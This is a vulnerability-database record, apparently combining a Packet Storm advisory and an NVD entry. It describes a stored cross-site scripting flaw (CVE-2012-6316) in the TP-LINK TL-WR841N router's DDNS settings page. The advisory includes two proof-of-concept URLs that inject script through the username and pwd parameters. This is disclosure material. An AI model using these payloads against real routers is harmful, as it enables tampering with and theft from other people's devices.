{"id": "PACKETSTORM:118237", "type": "packetstorm", "bulletinFamily": "exploit", "title": "TP-LINK TL-WR841N 3.13.9 Cross Site Scripting", "description": "", "published": "2012-11-20T00:00:00", "modified": "2012-11-20T00:00:00", "cvss": {"vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/", "score": 4.3}, "href": "https://packetstormsecurity.com/files/118237/TP-LINK-TL-WR841N-3.13.9-Cross-Site-Scripting.html", "reporter": "Matan Azugi", "references": [], "cvelist": ["CVE-2012-6316"], "lastseen": "2016-12-05T22:25:18", "viewCount": 4, "enchantments": {"score": {"value": 4.3, "vector": "NONE", "modified": "2016-12-05T22:25:18", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2012-6316"]}], "modified": "2016-12-05T22:25:18", "rev": 2}, "vulnersScore": 4.3}, "sourceHref": "https://packetstormsecurity.com/files/download/118237/tplinktlwr841n-xss.txt", "sourceData": "`=| Security Advisory - TP-LINK TL-WR841N XSS (Cross Site Scripting) |= \n \nIssue: TL-WR841N 300Mbps Wireless N Router by \"TP-LINK\" \nFirmware Version: 3.13.9 Build 120201 Rel.54965n and Below \nDiscovered Date: 17/11/2012 \nAuthor: Matan Azugi [matan@madsec.co.il] \nProduct Vendor: http://www.tp-link.com/en/products/details/?model=TL-WR841N \n \nDetails: \n \nTP-LINK TL-WR841N Wireless Router is prone to Cross Site Scripting \nVulnerability. \nThe vulnerability exists in Web-Based Management. \nRemote authenticated administrators may inject arbitrary JavaScript or HTML \nvia the username parameter or via pwd parameter to exploit Stored Cross Site \nScripting condition. \nExploitation URL: \n \n1. \nhttp://192.168.0.1/userRpm/NoipDdnsRpm.htm?provider=3&username=a1234</script \n><script>alert(1)</script>12aaa34f5be&pwd=password&cliUrl=&Save=Save \n2. \nhttp://192.168.0.1/userRpm/NoipDdnsRpm.htm?provider=3&username=1234&pwd=a123 \n4</script><script>alert(1)</script>12aaa34f5be&cliUrl=&Save=Save \n \nSuccessful exploitation allows the attacker to steal user information and \nmay allow the attacker to take full control over the user Browser. \n \n \n`\n"}

{"cve": [{"lastseen": "2021-02-02T05:59:57", "description": "Multiple cross-site scripting (XSS) vulnerabilities in the TP-LINK TL-WR841N router with firmware 3.13.9 Build 120201 Rel.54965n and earlier allow remote administrators to inject arbitrary web script or HTML via the (1) username or (2) pwd parameter to userRpm/NoipDdnsRpm.htm.", "edition": 6, "cvss3": {}, "published": "2014-09-30T14:55:00", "title": "CVE-2012-6316", "type": "cve", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-6316"], "modified": "2014-10-01T18:01:00", "cpe": ["cpe:/h:tp-link:tl-wr841n:-", "cpe:/o:tp-link:tl-wr841n_firmware:3.13.9"], "id": "CVE-2012-6316", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-6316", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:o:tp-link:tl-wr841n_firmware:3.13.9:*:*:*:*:*:*:*", "cpe:2.3:h:tp-link:tl-wr841n:-:*:*:*:*:*:*:*"]}]}